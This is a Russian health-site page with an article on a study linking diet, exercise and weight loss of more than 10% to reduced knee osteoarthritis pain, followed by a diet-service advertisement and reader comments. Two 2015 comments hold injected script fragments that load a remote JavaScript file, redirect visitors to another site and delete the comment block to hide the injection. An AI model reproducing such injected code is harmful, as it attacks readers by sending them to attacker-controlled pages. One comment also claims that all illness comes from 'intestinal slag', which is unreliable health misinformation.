Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Болят ноги? Избавьтесь вс...  >>  Болят ноги? Избавьтесь всего от 10% веса, и боль пройдет
 
Обратная связь
 

Болят ноги? Избавьтесь всего от 10% веса, и боль пройдет

Размер шрифта
23 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

В недавнем исследовании показано, что у пожилых людей можно достичь значительного снижения боли в коленном суставе, связанной с остеоартрозом, с помощью диеты и упражнений.

Болят ноги? Избавьтесь всего от 10% веса, и боль пройдет

«За последние двадцать лет количество операции по эндопротезированию коленного сустава у лиц старше 65 лет возросло на 162%! В денежном эквиваленте это – ни много, ни мало – пять миллиардов долларов в год!», – рассказывает Стивен Мессьер, глава исследовательской группы. «Мы считаем, что предложенная нами программа может в перспективе снизить количество выполняемых операций по замене сустава искусственным».

Данному исследованию предшествовала научная работа, в ходе которой было показано, что снижение массы тела на 5% приводило к ощутимому снижению болевого синдрома

«Мы подумали: 5% – это, конечно, здорово, но что если мы поднимем планку?», – говорит Мессьер. «Что если более интенсивная программа по снижению веса приведет к еще более впечатляющим клиническим результатам?»

В исследовании приняли участие 454 пациента с избыточном весом и диагностированным остеоартрозом, который проявлялся у них хроническими болями в коленях. Всех участников распределили на 3 группы: только диета, только упражнения и их сочетание.

Физические упражнения были представлены следующей программой: трижды в неделю, две серии ходьбы по 15 минут, между ними – блок силовых упражнений на 20 минут.

«В совокупности получается час, включая разогрев», – говорит Мессьер. «В нашей программе не было ничего сверхъестественного: все упражнения легко осуществимы вне зависимости от уровня физической подготовки».

Диетические ограничения были следующими: не больше 1200 калорий в день. Эта сумма распределялась на три приема пищи: полноценный обед (примерно 600 калорий) и два питательных коктейля по 300 калорий.

88% испытуемых успешно завершили курс, продолжительность которого составила 18 месяцев.

Ученые пришли к следующим результатам:

  • Комбинированная программа более эффективна для снижения веса, чем диета и упражнения по отдельности
  • Комбинированная программа в больше степени приводила к снижению болевого синдрома в области коленного сустава, улучшению его функции, повышению средней скорости передвижения.
  • Снижение воспалительной реакции удалось достичь только в группах «только диета» и «диета плюс упражнения»
  • Если сравнивать между собой группы «только упражнения» и «только диета», то в последней отмечалось более выраженное снижение нагрузки на сустав по итогам испытательной программы

«В общем и целом, наибольшего уменьшения проявлений остеоартроза удалось достичь тем испытуемым, которые сумели похудеть более чем на 10% от изначального веса», – утверждает Мессьер.

В любом случае, ученые в очередной раз доказали, что диета – важнейший элемент похудения и ключ к крепкому здоровью. Если вы хотите похудеть, «Диета Елены Малышевой» – это то, что вам нужно! Уже готовую и правильную еда привезут вам в любое удобное место и время! Вам останется только есть и худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Stepanko2008

23 декабря 2013 в 19:45

Цитировать   |   Пожаловаться

Отличный метод. Мое мнение: почти любую болезнь можно избежать, выбрав здоровое и правильное питание. Это успех к здоровью. Все наши болезни из-за шлакованности кишечника. Тем более, что сейчас качество пищи не лезет ни  в какие ворота.

2 - zzzzzz

30 июня 2015 в 18:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Выключите компьютер! Из-за него вы толстеете!   Диета по группе крови – полный обман! Как реально похудеть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.